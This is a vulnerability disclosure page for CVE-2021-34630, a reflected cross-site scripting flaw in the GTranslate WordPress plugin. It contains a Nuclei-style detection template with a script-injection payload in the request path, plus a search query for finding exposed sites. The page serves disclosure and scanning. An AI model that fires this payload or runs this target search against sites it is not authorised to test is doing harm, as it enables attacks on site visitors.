CVE-2021-34630: GTranslate < 2.8.65 - Cross-Site Scripting

2025-08-01 GTranslate PoC Public

Description

In the Pro and Enterprise versions of GTranslate < 2.8.65, the gtranslate_request_uri_var function runs at the top of all pages and echoes out the contents of $_SERVER['REQUEST_URI']. Although this uses addslashes, and most modern browsers automatically URLencode requests, this plugin is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below, or in cases where an attacker is able to modify the request en route between the client and the server, or in cases where the user is using an atypical browsing solution.

PoC

id: CVE-2021-34630

info:
  name: GTranslate < 2.8.65 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    In the Pro and Enterprise versions of GTranslate < 2.8.65, the gtranslate_request_uri_var function runs at the top of all pages and echoes out the contents of $_SERVER['REQUEST_URI']. Although this uses addslashes, and most modern browsers automatically URLencode requests, this plugin is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below, or in cases where an attacker is able to modify the request en route between the client and the server, or in cases where the user is using an atypical browsing solution.
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's browser session
  remediation: |
    Update GTranslate Plugin to the latest version to mitigate this issue.
  reference:
    - https://wpscan.com/vulnerability/dfac81bb-7807-4288-aee3-43c7653c6446/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34630
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-34630
    cwe-id: CWE-79
    epss-score: 0.01572
    epss-percentile: 0.74149
    cpe: cpe:2.3:a:gtranslate:gtranslate:*:*:*:*:enterprise:wordpress:*:*
  metadata:
    verifiedl: true
    max-request: 1
    vendor: gtranslate
    product: gtranslate
    framework: wordpress
    fofa-query: body="/wp-content/plugins/gtranslate"
  tags: cve,cve2021,wordpress,wp,wp-plugin,gtranslate,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?page</script><script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'
          - 'gtranslate'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022050a3b68b4c6b90d12f085d31c4e0a518468654c348264e470d51cd4ff0e29555022100c4a4b192af0356a1069e931012206e635ea27399fd85fabcc7f94ad1f17e4dfc:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities